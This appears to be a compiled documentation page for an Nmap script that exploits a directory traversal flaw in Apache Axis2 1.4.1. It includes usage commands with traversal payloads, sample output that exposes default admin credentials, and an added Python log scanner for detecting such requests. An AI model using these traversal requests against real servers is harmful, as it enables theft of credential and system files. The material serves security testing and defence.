http-axis2-dir-traversal
Script type:
portrule
Script categories:
vuln, intrusive, exploit
Script download URL: http://nmap.org/svn/scripts/http-axis2-dir-traversal.nse
Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service '/conf/axis2.xml' using the path '/axis2/services/' to return the username and password of the admin account.
To exploit this vulnerability we need to detect a valid service running on the installation, so we extract it from /listServices before exploiting the directory traversal vulnerability.
By default it will retrieve the configuration file; if you wish to retrieve other files, you need to set the argument http-axis2-dir-traversal.file correctly to traverse to the file's directory. Ex. ../../../../../../../../../etc/issue
To check the version of an Apache Axis2 installation go to: http://domain/axis2/services/Version/getVersion
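On the defending side, the request described above appears in web server access logs as a GET under the services base path with a traversal sequence in the xsd parameter. The following is an added example (not part of the Nmap script or the original page) that scans access log lines for that pattern; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

BASEPATH = "/axis2/services/"  # default base path named on this page
# Assumed log layout: Apache/nginx "combined" format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so encoded dots and slashes are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if any path segment of the decoded value is '..'."""
    return ".." in re.split(r"[\\/]+", fully_decode(value))

def find_xsd_traversal(log_lines, basepath=BASEPATH):
    """Return (ip, service, decoded_xsd, status) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        path = fully_decode(url.path)
        if not path.startswith(basepath):
            continue
        service = path[len(basepath):].split("/")[0]
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "xsd" and is_traversal(value):
                hits.append((m.group("ip"), service,
                             fully_decode(value), int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /axis2/services/listServices HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /axis2/services/Version?xsd=../../../../../../../etc/issue HTTP/1.1" 200 27 "-" "-"',
    '192.0.2.11 - - [01/Jan/2024:10:05:00 +0000] "GET /axis2/services/Version?xsd=..%2F..%2Fetc%2Fissue HTTP/1.1" 404 310 "-" "-"',
    '192.0.2.12 - - [01/Jan/2024:10:06:00 +0000] "GET /axis2/services/Version?xsd=xsd0 HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_xsd_traversal(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves priority in triage, since it suggests the server returned the requested file rather than rejecting the path.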
Reference:
Remote file to retrieve
Output file
Basepath to the services page. Default: /axis2/services/
Other useful arguments for this script:
User Agent used in the GET requests
Usage format
nmap -p80,8080 --script http-axis2-dir-traversal --script-args 'http-axis2-dir-traversal.file=../../../../../../../etc/issue' <host/ip>
nmap -p80 --script http-axis2-dir-traversal <host/ip>
80/tcp open http syn-ack
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2
Author: Paulino Calderon
License:
Compiled by VER007: http://www.ver007.com